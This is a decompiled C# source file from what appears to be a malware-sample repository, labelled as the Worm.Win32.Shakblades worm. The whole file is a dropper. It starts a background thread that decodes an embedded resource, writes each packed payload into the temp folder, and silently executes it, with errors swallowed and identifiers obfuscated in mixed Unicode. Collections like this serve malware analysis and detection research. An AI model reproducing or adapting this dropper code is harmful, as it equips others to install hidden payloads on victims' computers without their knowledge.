MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/৐෧ᠮबZố.cs

38 lines
1.3 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.৐෧ᠮबZố
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Threading;
namespace Ҧ߲ʽ
{
internal class \u09D0෧ᠮबZố
{
public static void () => new Thread((ThreadStart) (() =>
{
BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(\u1928ᔾዔ.\u09D1য়᪷((byte[]) new ResourceManager("b", Assembly.GetExecutingAssembly()).GetObject("b"), false)));
while (binaryReader.PeekChar() != -1)
{
string str = binaryReader.ReadString();
int count = binaryReader.ReadInt32();
byte[] bytes = binaryReader.ReadBytes(count);
try
{
if (!File.Exists(Path.GetTempPath() + str))
File.WriteAllBytes(Path.GetTempPath() + str, bytes);
Process.Start(Path.GetTempPath() + str);
}
catch
{
}
}
})).Start();
}
}